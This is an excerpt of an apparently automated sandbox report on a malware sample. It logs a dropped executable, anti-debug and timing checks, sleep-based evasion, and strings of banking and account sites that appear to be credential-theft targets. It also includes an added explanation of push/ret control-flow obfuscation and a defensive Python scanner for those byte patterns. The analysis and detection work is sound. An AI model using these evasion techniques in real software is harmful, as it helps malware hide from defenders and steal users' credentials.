                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00412559 push ecx; iretd | 5_2_0041255A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004125DC pushfd; iretd | 5_2_004125FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00405E25 push ecx; ret | 5_2_00405E2B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00401F0E push ss; retf | 5_2_00401F14
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02CD225F pushad; ret | 5_2_02CD27F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02CD27FA pushad; ret | 5_2_02CD27F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02CD283D push eax; iretd | 5_2_02CD2858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02D009AD push ecx; mov dword ptr [esp], ecx | 5_2_02D009B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02CD1368 push eax; iretd | 5_2_02CD1369
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052527FA pushad; ret | 10_2_052527F9
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_0525225F pushad; ret | 10_2_052527F9
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_052809AD push ecx; mov dword ptr [esp], ecx | 10_2_052809B6
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_0525283D push eax; iretd | 10_2_05252858
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_05251368 push eax; iretd | 10_2_05251369
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_03252BA2 push ecx; ret | 10_2_03252BA8
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_0325F359 pushfd; iretd | 10_2_0325F378
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_0325527C push ebp; iretd | 10_2_0325527F
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_03255257 push esi; retf | 10_2_0325525A
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_0325F2D6 push ecx; iretd | 10_2_0325F2D7
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_03267B60 push FFFFFFC3h; ret | 10_2_03267BCA
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_03273A40 pushad; iretd | 10_2_03273A68
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_03267953 push ds; ret | 10_2_03267955
                Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_032678DE pushfd; ret | 10_2_032678F5
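The push/ret pairs listed for RegAsm.exe and runonce.exe are a control-flow obfuscation: pushing a value and then executing ret (or retf/iretd, which also pop a new CS and flags) transfers control to that value without any call or jmp, so static call graphs miss the target and a stack-walking EDR sees a return to a frame no call ever set up. The scanner below is an added example, not the sandbox's own detector: it finds the same byte pairs in a code buffer. The opcode table is this editor's, and the sample buffer is constructed for the demo rather than dumped from the sample.

```python
"""Linear scan for 'push X; ret/retf/iretd' byte pairs in 32-bit x86 code.
Added example with an editorial opcode table; not Joe Sandbox code."""

# One-byte push forms (32-bit mode).
PUSH = {
    0x50: "push eax", 0x51: "push ecx", 0x52: "push edx", 0x53: "push ebx",
    0x54: "push esp", 0x55: "push ebp", 0x56: "push esi", 0x57: "push edi",
    0x06: "push es",  0x0E: "push cs",  0x16: "push ss",  0x1E: "push ds",
    0x9C: "pushfd",   0x60: "pushad",
}
PUSH_IMM8 = 0x6A                       # push imm8, sign-extended to 32 bits
RET = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}


def scan_push_ret(code: bytes, base: int = 0) -> list[tuple[int, str]]:
    """Return (address, mnemonic) for every push immediately followed by a
    return.  This is byte matching without disassembly, so it also fires on
    data or on the tail of a longer instruction that happens to contain these
    bytes; treat hits as leads to confirm in a disassembler, which is what the
    sandbox's 'Code function' addresses above invite."""
    hits = []
    i = 0
    while i < len(code) - 1:
        op = code[i]
        if op in PUSH and code[i + 1] in RET:
            hits.append((base + i, f"{PUSH[op]}; {RET[code[i + 1]]}"))
            i += 2
        elif op == PUSH_IMM8 and i + 2 < len(code) and code[i + 2] in RET:
            imm = code[i + 1] - 0x100 if code[i + 1] & 0x80 else code[i + 1]
            hits.append((base + i, f"push {imm & 0xFFFFFFFF:08X}h; {RET[code[i + 2]]}"))
            i += 3
        else:
            i += 1
    return hits


# Constructed sample: an ordinary prologue and epilogue around the same pair
# shapes the report lists (push reg; ret, pushfd; ret, push ds; ret,
# push reg; iretd, push reg; retf, push FFFFFFC3h; ret).
SAMPLE = bytes([
    0x55, 0x8B, 0xEC,        # push ebp; mov ebp, esp      (normal, no hit)
    0x53, 0xC3,              # push ebx; ret
    0x90, 0x90,              # nop; nop
    0x9C, 0xC3,              # pushfd; ret
    0x1E, 0xC3,              # push ds; ret
    0x52, 0xCF,              # push edx; iretd
    0x56, 0xCB,              # push esi; retf
    0x6A, 0xC3, 0xC3,        # push FFFFFFC3h; ret   (6A C3 = push imm8 -0x3D)
    0x33, 0xC0, 0xC3,        # xor eax, eax; ret           (normal, no hit)
])

if __name__ == "__main__":
    for addr, text in scan_push_ret(SAMPLE, base=0x401000):
        print(f"{addr:08X}  {text}")
```

The sign extension matters for the imm8 form: the single byte C3h becomes the 32-bit value FFFFFFC3h, exactly the operand the report prints for 10_2_03267B60, and a ret to that address faults, which is itself a trick to trip an emulator or debugger that follows the flow blindly.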
                Source: x.exe.0.dr | Static PE information: section name: |]e@TkD entropy: 7.999327421961065
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\x.exe (dropped file)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (99 identical entries)
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Process information set: NOOPENFILEERRORBOX (17 identical entries)
                Source: C:\Windows\SysWOW64\runonce.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 identical entries)

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\SysWOW64\runonce.exe API/Special instruction interceptor: Address: 7FF90818D324
                Source: C:\Windows\SysWOW64\runonce.exe API/Special instruction interceptor: Address: 7FF90818D7E4
                Source: C:\Windows\SysWOW64\runonce.exe API/Special instruction interceptor: Address: 7FF90818D944
                Source: C:\Windows\SysWOW64\runonce.exe API/Special instruction interceptor: Address: 7FF90818D504
                Source: C:\Windows\SysWOW64\runonce.exe API/Special instruction interceptor: Address: 7FF90818D544
                Source: C:\Windows\SysWOW64\runonce.exe API/Special instruction interceptor: Address: 7FF90818D1E4
                Source: C:\Windows\SysWOW64\runonce.exe API/Special instruction interceptor: Address: 7FF908190154
                Source: C:\Windows\SysWOW64\runonce.exe API/Special instruction interceptor: Address: 7FF90818DA44
                Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: D90000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 27D0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 2570000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 4DE0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 5DE0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 5F10000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 6F10000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D4096E rdtsc 5_2_02D4096E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3874
                Source: C:\Windows\SysWOW64\runonce.exe Window / User API: threadDelayed 9806
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\runonce.exe API coverage: 2.6 %
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7608 Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7636 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\runonce.exe TID: 8100 Thread sleep count: 166 > 30
                Source: C:\Windows\SysWOW64\runonce.exe TID: 8100 Thread sleep time: -332000s >= -30000s
                Source: C:\Windows\SysWOW64\runonce.exe TID: 8100 Thread sleep count: 9806 > 30
                Source: C:\Windows\SysWOW64\runonce.exe TID: 8100 Thread sleep time: -19612000s >= -30000s
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe TID: 3648 Thread sleep time: -35000s >= -30000s
                Source: C:\Windows\SysWOW64\runonce.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\runonce.exe Code function: 10_2_0326C8D0 FindFirstFileW,FindNextFileW,FindClose, 10_2_0326C8D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                Source: 6511-iOQ--.10.dr Binary or memory string: dev.azure.comVMware20,11696497155j
                Source: 6511-iOQ--.10.dr Binary or memory string: global block list test formVMware20,11696497155
                Source: 6511-iOQ--.10.dr Binary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: runonce.exe, 0000000A.00000002.2608327762.000000000365A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla(I
                Source: 6511-iOQ--.10.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: 6511-iOQ--.10.dr Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: 6511-iOQ--.10.dr Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: 6511-iOQ--.10.dr Binary or memory string: tasks.office.comVMware20,11696497155o
                Source: 6511-iOQ--.10.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: 6511-iOQ--.10.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: firefox.exe, 0000000E.00000002.2128057788.00000171EB59D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 6511-iOQ--.10.dr Binary or memory string: bankofamerica.comVMware20,11696497155x
                Source: 6511-iOQ--.10.dr Binary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: 6511-iOQ--.10.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: 6511-iOQ--.10.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: 6511-iOQ--.10.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: 6511-iOQ--.10.dr Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: 6511-iOQ--.10.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: 6511-iOQ--.10.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: 6511-iOQ--.10.dr Binary or memory string: interactivebrokers.comVMware20,11696497155
                Source: 6511-iOQ--.10.dr Binary or memory string: AMC password management pageVMware20,11696497155
                Source: 6511-iOQ--.10.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: 6511-iOQ--.10.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: 6511-iOQ--.10.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: 6511-iOQ--.10.dr Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: y85te3vqfc6QGAKyw78l.exe, 0000000D.00000002.2612191080.0000000001219000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
                Source: 6511-iOQ--.10.dr Binary or memory string: discord.comVMware20,11696497155f
                Source: 6511-iOQ--.10.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: 6511-iOQ--.10.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: 6511-iOQ--.10.dr Binary or memory string: outlook.office365.comVMware20,11696497155t
                Source: 6511-iOQ--.10.dr Binary or memory string: outlook.office.comVMware20,11696497155s
                Source: 6511-iOQ--.10.dr Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: 6511-iOQ--.10.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: 6511-iOQ--.10.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\runonce.exe Process queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D4096E rdtsc 5_2_02D4096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00417A93 LdrLoadDll, 5_2_00417A93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DD62D6 mov eax, dword ptr fs:[00000030h] 5_2_02DD62D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D0A2C3 mov eax, dword ptr fs:[00000030h] 5_2_02D0A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D102E1 mov eax, dword ptr fs:[00000030h] 5_2_02D102E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D3E284 mov eax, dword ptr fs:[00000030h] 5_2_02D3E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D80283 mov eax, dword ptr fs:[00000030h] 5_2_02D80283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D102A0 mov eax, dword ptr fs:[00000030h] 5_2_02D102A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D962A0 mov eax, dword ptr fs:[00000030h] 5_2_02D962A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D962A0 mov ecx, dword ptr fs:[00000030h] 5_2_02D962A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D962A0 mov eax, dword ptr fs:[00000030h] 5_2_02D962A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DD625D mov eax, dword ptr fs:[00000030h] 5_2_02DD625D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D06259 mov eax, dword ptr fs:[00000030h] 5_2_02D06259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DBA250 mov eax, dword ptr fs:[00000030h] 5_2_02DBA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D88243 mov eax, dword ptr fs:[00000030h] 5_2_02D88243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D88243 mov ecx, dword ptr fs:[00000030h] 5_2_02D88243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02CFA250 mov eax, dword ptr fs:[00000030h] 5_2_02CFA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02CF826B mov eax, dword ptr fs:[00000030h] 5_2_02CF826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DB0274 mov eax, dword ptr fs:[00000030h] 5_2_02DB0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D04260 mov eax, dword ptr fs:[00000030h] 5_2_02D04260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02CF823B mov eax, dword ptr fs:[00000030h] 5_2_02CF823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DAE3DB mov eax, dword ptr fs:[00000030h] 5_2_02DAE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DAE3DB mov ecx, dword ptr fs:[00000030h] 5_2_02DAE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DAE3DB mov eax, dword ptr fs:[00000030h] 5_2_02DAE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DA43D4 mov eax, dword ptr fs:[00000030h] 5_2_02DA43D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D0A3C0 mov eax, dword ptr fs:[00000030h] 5_2_02D0A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D083C0 mov eax, dword ptr fs:[00000030h] 5_2_02D083C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DBC3CD mov eax, dword ptr fs:[00000030h] 5_2_02DBC3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D863C0 mov eax, dword ptr fs:[00000030h] 5_2_02D863C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D1E3F0 mov eax, dword ptr fs:[00000030h] 5_2_02D1E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D363FF mov eax, dword ptr fs:[00000030h] 5_2_02D363FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D103E9 mov eax, dword ptr fs:[00000030h] 5_2_02D103E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02CFE388 mov eax, dword ptr fs:[00000030h] 5_2_02CFE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02CF8397 mov eax, dword ptr fs:[00000030h] 5_2_02CF8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D2438F mov eax, dword ptr fs:[00000030h] 5_2_02D2438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D8035C mov eax, dword ptr fs:[00000030h] 5_2_02D8035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D8035C mov ecx, dword ptr fs:[00000030h] 5_2_02D8035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D8035C mov eax, dword ptr fs:[00000030h] 5_2_02D8035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DA8350 mov ecx, dword ptr fs:[00000030h] 5_2_02DA8350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DCA352 mov eax, dword ptr fs:[00000030h] 5_2_02DCA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D82349 mov eax, dword ptr fs:[00000030h] 5_2_02D82349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DD634F mov eax, dword ptr fs:[00000030h] 5_2_02DD634F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DA437C mov eax, dword ptr fs:[00000030h] 5_2_02DA437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D20310 mov ecx, dword ptr fs:[00000030h] 5_2_02D20310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D3A30B mov eax, dword ptr fs:[00000030h] 5_2_02D3A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02CFC310 mov ecx, dword ptr fs:[00000030h] 5_2_02CFC310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DD8324 mov eax, dword ptr fs:[00000030h] 5_2_02DD8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DD8324 mov ecx, dword ptr fs:[00000030h] 5_2_02DD8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DD8324 mov eax, dword ptr fs:[00000030h] 5_2_02DD8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D820DE mov eax, dword ptr fs:[00000030h] 5_2_02D820DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D420F0 mov ecx, dword ptr fs:[00000030h] 5_2_02D420F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02CFA0E3 mov ecx, dword ptr fs:[00000030h] 5_2_02CFA0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D860E0 mov eax, dword ptr fs:[00000030h] 5_2_02D860E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D080E9 mov eax, dword ptr fs:[00000030h] 5_2_02D080E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02CFC0F0 mov eax, dword ptr fs:[00000030h] 5_2_02CFC0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D0208A mov eax, dword ptr fs:[00000030h] 5_2_02D0208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DC60B8 mov eax, dword ptr fs:[00000030h] 5_2_02DC60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DC60B8 mov ecx, dword ptr fs:[00000030h] 5_2_02DC60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02CF80A0 mov eax, dword ptr fs:[00000030h] 5_2_02CF80A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D980A8 mov eax, dword ptr fs:[00000030h] 5_2_02D980A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D02050 mov eax, dword ptr fs:[00000030h] 5_2_02D02050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D86050 mov eax, dword ptr fs:[00000030h] 5_2_02D86050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D2C073 mov eax, dword ptr fs:[00000030h] 5_2_02D2C073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D1E016 mov eax, dword ptr fs:[00000030h] 5_2_02D1E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D84000 mov ecx, dword ptr fs:[00000030h] 5_2_02D84000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DA2000 mov eax, dword ptr fs:[00000030h] 5_2_02DA2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D96030 mov eax, dword ptr fs:[00000030h] 5_2_02D96030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02CFA020 mov eax, dword ptr fs:[00000030h] 5_2_02CFA020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02CFC020 mov eax, dword ptr fs:[00000030h] 5_2_02CFC020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D7E1D0 mov eax, dword ptr fs:[00000030h] 5_2_02D7E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D7E1D0 mov ecx, dword ptr fs:[00000030h] 5_2_02D7E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D7E1D0 mov eax, dword ptr fs:[00000030h] 5_2_02D7E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DC61C3 mov eax, dword ptr fs:[00000030h] 5_2_02DC61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D301F8 mov eax, dword ptr fs:[00000030h] 5_2_02D301F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DD61E5 mov eax, dword ptr fs:[00000030h] 5_2_02DD61E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D8019F mov eax, dword ptr fs:[00000030h] 5_2_02D8019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8019F mov eax, dword ptr fs:[00000030h]5_2_02D8019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D40185 mov eax, dword ptr fs:[00000030h]5_2_02D40185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DBC188 mov eax, dword ptr fs:[00000030h]5_2_02DBC188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DBC188 mov eax, dword ptr fs:[00000030h]5_2_02DBC188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFA197 mov eax, dword ptr fs:[00000030h]5_2_02CFA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFA197 mov eax, dword ptr fs:[00000030h]5_2_02CFA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFA197 mov eax, dword ptr fs:[00000030h]5_2_02CFA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA4180 mov eax, dword ptr fs:[00000030h]5_2_02DA4180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA4180 mov eax, dword ptr fs:[00000030h]5_2_02DA4180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D98158 mov eax, dword ptr fs:[00000030h]5_2_02D98158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D06154 mov eax, dword ptr fs:[00000030h]5_2_02D06154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D06154 mov eax, dword ptr fs:[00000030h]5_2_02D06154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFC156 mov eax, dword ptr fs:[00000030h]5_2_02CFC156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D94144 mov eax, dword ptr fs:[00000030h]5_2_02D94144
